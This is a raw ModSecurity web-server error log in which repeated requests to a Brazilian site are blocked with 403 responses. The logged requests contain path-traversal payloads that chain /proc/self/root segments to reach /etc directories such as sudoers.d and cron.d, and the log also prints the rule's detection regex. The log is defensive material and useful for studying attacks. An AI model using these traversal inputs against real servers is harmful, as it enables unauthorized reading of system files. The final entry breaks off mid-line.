[Tue Mar 17 12:10:58.771434 2026] [:error] [pid 2598:tid 140411683178240] [client 74.7.243.203:53676] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablvAhj0p0SRWAqcjGFvGQAAAwc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:11:18.122368 2026] [:error] [pid 9155:tid 140411733534464] [client 74.7.243.203:53764] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablvFtbI7zhHXcabyMU0_gAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 12:11:23.720256 2026] [:error] [pid 17965:tid 140411599251200] [client 74.7.243.203:60168] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablvG6t8Nd0UC_OcbVG_MQAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:11:52.395545 2026] [:error] [pid 2473:tid 140411725141760] [client 74.7.241.46:54674] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablvOKBJNF7axNlVR0ULbQAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:12:04.171878 2026] [:error] [pid 9299:tid 140411565680384] [client 74.7.241.46:48062] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablvRL-sgTmmJoPuMdys4QAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:12:06.714560 2026] [:error] [pid 2598:tid 140411666392832] [client 74.7.244.31:36168] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablvRhj0p0SRWAqcjGFvLQAAAwk"]
[Tue Mar 17 12:13:17.057055 2026] [:error] [pid 18380:tid 140411574073088] [client 74.7.241.46:47664] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablvja4xEDsg_V3ESNZBdgAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:13:18.362872 2026] [:error] [pid 9155:tid 140411683178240] [client 74.7.241.46:59186] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablvjtbI7zhHXcabyMU1XQAAAkc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:13:23.425314 2026] [:error] [pid 9155:tid 140411590858496] [client 74.7.241.46:59198] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablvk9bI7zhHXcabyMU1YQAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:13:28.002007 2026] [:error] [pid 2598:tid 140411683178240] [client 74.7.241.46:59212] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablvmBj0p0SRWAqcjGFvXwAAAwc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:13:35.331581 2026] [:error] [pid 9299:tid 140411658000128] [client 74.7.241.46:58576] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablvn7-sgTmmJoPuMdytBQAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:13:36.976983 2026] [:error] [pid 17965:tid 140411733534464] [client 74.7.241.46:58588] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablvoKt8Nd0UC_OcbVG_dQAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:14:40.879528 2026] [:error] [pid 17965:tid 140411716749056] [client 74.7.241.46:50526] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablv4Kt8Nd0UC_OcbVHAAQAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:15:02.021276 2026] [:error] [pid 2598:tid 140411590858496] [client 74.7.241.46:60790] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablv9hj0p0SRWAqcjGFvggAAAxI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:15:11.814857 2026] [:error] [pid 18380:tid 140411733534464] [client 74.7.241.46:39342] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablv_64xEDsg_V3ESNZBlgAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:15:38.972459 2026] [:error] [pid 7437:tid 140411716749056] [client 74.7.241.46:41644] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablwGgeiSKl8TjouI-YRNQAAA8M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:17:06.472969 2026] [:error] [pid 2473:tid 140411557287680] [client 74.7.244.31:56028] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablwcaBJNF7axNlVR0UMHAAAABY"]
[Tue Mar 17 12:17:51.315315 2026] [:error] [pid 17965:tid 140411624429312] [client 74.7.241.46:33030] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablwn6t8Nd0UC_OcbVHAegAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:17:54.144837 2026] [:error] [pid 9155:tid 140411658000128] [client 74.7.228.16:60792] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablwotbI7zhHXcabyMU1vwAAAko"]
[Tue Mar 17 12:19:54.170610 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.241.46:33788] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablxGtY0UrI5A3LftIzyGgAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:20:04.059221 2026] [:error] [pid 9155:tid 140411666392832] [client 74.7.241.46:33792] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablxJNbI7zhHXcabyMU2SQAAAkk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:20:07.266281 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.46:60564] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablxJ9Y0UrI5A3LftIzyIQAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 12:20:08.607425 2026] [:error] [pid 2598:tid 140411708356352] [client 74.7.241.46:39520] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablxKBj0p0SRWAqcjGFwngAAAwQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 12:20:09.778690 2026] [:error] [pid 2160:tid 140411607643904] [client 74.7.241.46:39522] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag 